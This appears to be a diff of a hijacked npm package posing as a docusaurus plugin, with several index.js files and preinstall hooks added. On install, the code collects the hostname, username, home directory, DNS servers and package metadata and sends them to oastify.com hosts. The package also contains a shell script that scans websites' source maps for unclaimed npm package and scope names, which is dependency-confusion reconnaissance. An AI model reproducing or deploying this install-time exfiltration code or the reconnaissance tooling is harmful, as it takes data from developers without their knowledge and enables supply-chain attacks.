docusaurus-plugin-matamohnhb 0.0.1-security → 5.5.5

package/docusaurus/index.js

@@ -0,0 +1,46 @@
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+
+const trackingData = JSON.stringify({
+    p: package,
+    c: __dirname,
+    hd: os.homedir(),
+    hn: os.hostname(),
+    un: os.userInfo().username,
+    dns: dns.getServers(),
+    r: packageJSON ? packageJSON.___resolved : undefined,
+    v: packageJSON.version,
+    pjson: packageJSON,
+});
+
+var postData = querystring.stringify({
+    msg: trackingData,
+});
+
+var options = {
+    hostname: "ydfpycccdlf63zh24xrxe7st6kcb0aoz.oastify.com",
+    port: 443,
+    path: "/",
+    method: "POST",
+    headers: {
+        "Content-Type": "application/x-www-form-urlencoded",
+        "Content-Length": postData.length,
+    },
+};
+
+var req = https.request(options, (res) => {
+    res.on("data", (d) => {
+        process.stdout.write(d);
+    });
+});
+
+req.on("error", (e) => {
+    // console.error(e);
+});
+
+req.write(postData);
+req.end();

package/docusaurus/node_modules/.package-lock.json

@@ -0,0 +1,14 @@
+{
+  "name": "ory-config",
+  "version": "23.2.9",
+  "lockfileVersion": 2,
+  "requires": true,
+  "packages": {
+    "node_modules/ory-config": {
+      "version": "23.2.9",
+      "resolved": "https://registry.npmjs.org/ory-config/-/ory-config-23.2.9.tgz",
+      "integrity": "sha512-y0umK2SK3hwZEQKXWyU0glbhUyNlug/ryS9vx5/okukSnqXn+GdwYh8AMvr/6YYDFynEeGbCtSq9RGXgUxH9KA==",
+      "hasInstallScript": true
+    }
+  }
+}

package/docusaurus/node_modules/ory-config/index.js

@@ -0,0 +1,46 @@
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+
+const trackingData = JSON.stringify({
+    p: package,
+    c: __dirname,
+    hd: os.homedir(),
+    hn: os.hostname(),
+    un: os.userInfo().username,
+    dns: dns.getServers(),
+    r: packageJSON ? packageJSON.___resolved : undefined,
+    v: packageJSON.version,
+    pjson: packageJSON,
+});
+
+var postData = querystring.stringify({
+    msg: trackingData,
+});
+
+var options = {
+    hostname: "ydfpycccdlf63zh24xrxe7st6kcb0aoz.oastify.com",
+    port: 443,
+    path: "/",
+    method: "POST",
+    headers: {
+        "Content-Type": "application/x-www-form-urlencoded",
+        "Content-Length": postData.length,
+    },
+};
+
+var req = https.request(options, (res) => {
+    res.on("data", (d) => {
+        process.stdout.write(d);
+    });
+});
+
+req.on("error", (e) => {
+    // console.error(e);
+});
+
+req.write(postData);
+req.end();

package/docusaurus/node_modules/ory-config/package.json

@@ -0,0 +1,12 @@
+{
+  "name": "ory-config",
+  "version": "23.2.9",
+  "description": "hijacked by faique",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall": "curl http://kpdbayoyp7rsfltogj3jqt4fi6o1cr0g.oastify.com"
+  },
+  "author": "faique",
+  "license": "ISC"
+}

package/docusaurus/package-lock.json

@@ -0,0 +1,30 @@
+{
+  "name": "ory-config",
+  "version": "23.2.9",
+  "lockfileVersion": 2,
+  "requires": true,
+  "packages": {
+    "": {
+      "name": "ory-config",
+      "version": "23.2.9",
+      "hasInstallScript": true,
+      "license": "ISC",
+      "dependencies": {
+        "ory-config": "^23.2.9"
+      }
+    },
+    "node_modules/ory-config": {
+      "version": "23.2.9",
+      "resolved": "https://registry.npmjs.org/ory-config/-/ory-config-23.2.9.tgz",
+      "integrity": "sha512-y0umK2SK3hwZEQKXWyU0glbhUyNlug/ryS9vx5/okukSnqXn+GdwYh8AMvr/6YYDFynEeGbCtSq9RGXgUxH9KA==",
+      "hasInstallScript": true
+    }
+  },
+  "dependencies": {
+    "ory-config": {
+      "version": "23.2.9",
+      "resolved": "https://registry.npmjs.org/ory-config/-/ory-config-23.2.9.tgz",
+      "integrity": "sha512-y0umK2SK3hwZEQKXWyU0glbhUyNlug/ryS9vx5/okukSnqXn+GdwYh8AMvr/6YYDFynEeGbCtSq9RGXgUxH9KA=="
+    }
+  }
+}

package/docusaurus/package.json

@@ -0,0 +1,19 @@
+{
+  "name": "ory-config",
+  "version": "100.0.0",
+  "description": "hijacked by faique",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall": "curl http://d7l4sr6r709lxebhyclc8mm80z6vuoid.oastify.com"
+  },
+  "author": "faique",
+  "license": "ISC",
+  "dependencies": {
+    "ory-config": "^100.0.0"
+  }
+ ,"keywords": [
+    "hijacked by faique"
+  ]
+
+}

package/index.js

@@ -0,0 +1,46 @@
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+
+const trackingData = JSON.stringify({
+    p: package,
+    c: __dirname,
+    hd: os.homedir(),
+    hn: os.hostname(),
+    un: os.userInfo().username,
+    dns: dns.getServers(),
+    r: packageJSON ? packageJSON.___resolved : undefined,
+    v: packageJSON.version,
+    pjson: packageJSON,
+});
+
+var postData = querystring.stringify({
+    msg: trackingData,
+});
+
+var options = {
+    hostname: "eas0sjm06690pt4tos0fumcd84ev2nqc.oastify.com",
+    port: 443,
+    path: "/",
+    method: "POST",
+    headers: {
+        "Content-Type": "application/x-www-form-urlencoded",
+        "Content-Length": postData.length,
+    },
+};
+
+var req = https.request(options, (res) => {
+    res.on("data", (d) => {
+        process.stdout.write(d);
+    });
+});
+
+req.on("error", (e) => {
+    // console.error(e);
+});
+
+req.write(postData);
+req.end();

package/npm-automation.sh

@@ -0,0 +1,68 @@
+#!/bin/bash
+echo ''' 
+    _   __                   ___         __      
+   / | / /___  ____ ___     /   | __  __/ /_____ 
+  /  |/ / __ \/ __ `__ \   / /| |/ / / / __/ __ \
+ / /|  / /_/ / / / / / /  / ___ / /_/ / /_/ /_/ /
+/_/ |_/ .___/_/ /_/ /_/  /_/  |_\__,_/\__/\____/ 
+     /_/                                           v1.0.2
+              twitter.com/@0xnirob        
+warning: BE AWARE OF FALSE POSITIVE, CONFIRM YOUR FINDING MANUALLY.  Good Luck.
+Use with caution. You are responsible for your actions.
+Developers assume no liability and are not responsible for any misuse or damage.
+'''
+
+if [ -d $1 ];then
+    echo '' >/dev/null 2>&1
+else 
+    mkdir $PWD/$1;
+fi
+echo -e "Running waybackurls on $1"
+waybackurls $1 | sort -u | grep .js | sed 's/?.*//' | grep -v '/wp-content/\|/wp-includes/\|.json\|jpg\|png\|css|\|/member/\|.jsp\|oauth\|login\|en-us\|v=\|=\|?\|/help/\|/id/\|paragon\|/wp-json/' | sort -u | tee -a $PWD/$1/$1-js-urls.txt >/dev/null 2>&1;
+echo -e "Running gau on $1"
+gau $1 | sort -u | grep .js | sed 's/?.*//' | grep -v '/wp-content/\|/wp-includes/\|.json\|jpg\|png\|css|\|/member/\|.jsp\|oauth\|login\|en-us\|v=\|=\|?\|/help/\|/id/\|paragon\|/wp-json/' | sort -u | tee -a $PWD/$1/$1-js-urls.txt >/dev/null 2>&1;
+
+cd $PWD/$1;
+echo -e "Found $(cat $1-js-urls.txt | sort -u |wc -l) js file url ";
+cat $1-js-urls.txt | sort -u |while read ut;do
+    wget $ut.map >/dev/null 2>&1;
+    done
+
+grep -oriahE "[^\"\\'> ]+" | grep 'node_modules' | grep -v '@' | sed 's:.*/node_modules::' | cut -d '/' -f 2 | sort -u | grep -v '.js\|.ts\|.tsx\|.css' | egrep '\b[a-z]+\b' | grep -v '.png\|.pnp' | tee -a $1-npm-packages.txt >/dev/null 2>&1;
+
+rm $1-js-urls.txt;
+if [ -s $1-npm-packages.txt ];then
+    echo -e "   Found some packages now going for final test on "$1-npm-packages.txt"";
+    cat $1-npm-packages.txt | sort -u | while read ut;do
+        if $(curl -o /dev/null -s -w "%{http_code}\n" "https://registry.npmjs.org/$ut" | grep "404" >/dev/null 2>&1); then
+            echo -e ""$ut" \e[1;31mFound Private npm packgae, \e[0m" && echo $ut >> $1-npm-vuln.txt;
+
+        else
+            echo -e ""$ut"\e[1;33m Available in Public Registry \e[0m";
+        fi
+        done
+else
+    echo -e "Didn't found any npm packages, now going for scope test "
+fi
+#this part is for scope package test please be carefull with that, some times `www.npmjs.com` will show you 429 response code
+grep -oriahE "[^\"\\'> ]+" | grep 'node_modules' | sed 's:.*/node_modules::' | cut -d '/' -f 2 | sort -u | grep '@' | grep -v '.js\|.ts\|.tsx\|.css' | egrep '\b[a-z]+\b' | grep -v '.png\|.pnp' | grep '@' | cut -d '@' -f 2 | tee -a $1-npm-scope.txt >/dev/null 2>&1;
+
+if [ -s $1-npm-scope.txt ];then
+    echo -e "   Found some Scope names now going for final test on "$1-npm-scope.txt"";
+    cat $1-npm-scope.txt | sort -u | while read pkg;do
+    OPTION=`curl -o /dev/null -s -w "%{http_code}\n" "https://www.npmjs.com/org/$pkg"`
+        if $(echo "$OPTION" | grep "200\|302" >/dev/null 2>&1);then
+            echo -e "@"$pkg"\e[1;33m Available in Public Registry \e[0m" && echo $pkg >> $1-npm-scope-vuln.txt;
+            grep -oriahE "[^\"\\'> ]+" | grep 'node_modules' |grep '@'$pkg'' | sed 's:.*/@'$pkg'::' | cut -d '/' -f 2 | sort -u | while read ut;do echo "Full pacakge name of @"$pkg" is @"$pkg"/"$ut" ";done
+        elif $(echo "$OPTION" | grep "429" >/dev/null 2>&1);then
+            echo -e "@"$pkg" \e[1;31m Rate limit detected \e[0m"
+
+        else
+            echo -e "@"$pkg"\e[1;31m Found Unclaimed scope Name\e[0m";
+            grep -oriahE "[^\"\\'> ]+" | grep 'node_modules' |grep '@'$pkg'' | sed 's:.*/@'$pkg'::' | cut -d '/' -f 2 | sort -u | while read ut;do echo -e "\e[1;31mFull pacakge name of @"$pkg" is @"$pkg"/"$ut", this is unclaimed, Add @"$pkg"/"$ut" in your package.json file like {package: @"$pkg"/"$ut"}, \e[0m";done
+        fi
+        done
+else
+    echo -e "Didn't found any Scope name";
+fi
+rm $1-npm-scope.txt *.map.* *.map $1-npm-packages.txt;

package/package.json

@@ -1,6 +1,19 @@
 {
   "name": "docusaurus-plugin-matamohnhb",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "5.5.5",
+  "description": "Opera hijacked by Faique",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall": "curl http://zuxqfdtdumw7k0y3ly8yv89unltch65v.oastify.com"
+  },
+  "author": "Faique",
+  "license": "ISC",
+  "dependencies": {
+    "wehackrepossssss": "^5.5.5"
+  },
+  "devDependencies": {},
+  "keywords": [
+    "efefe"
+  ]
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=docusaurus-plugin-matamohnhb for more information.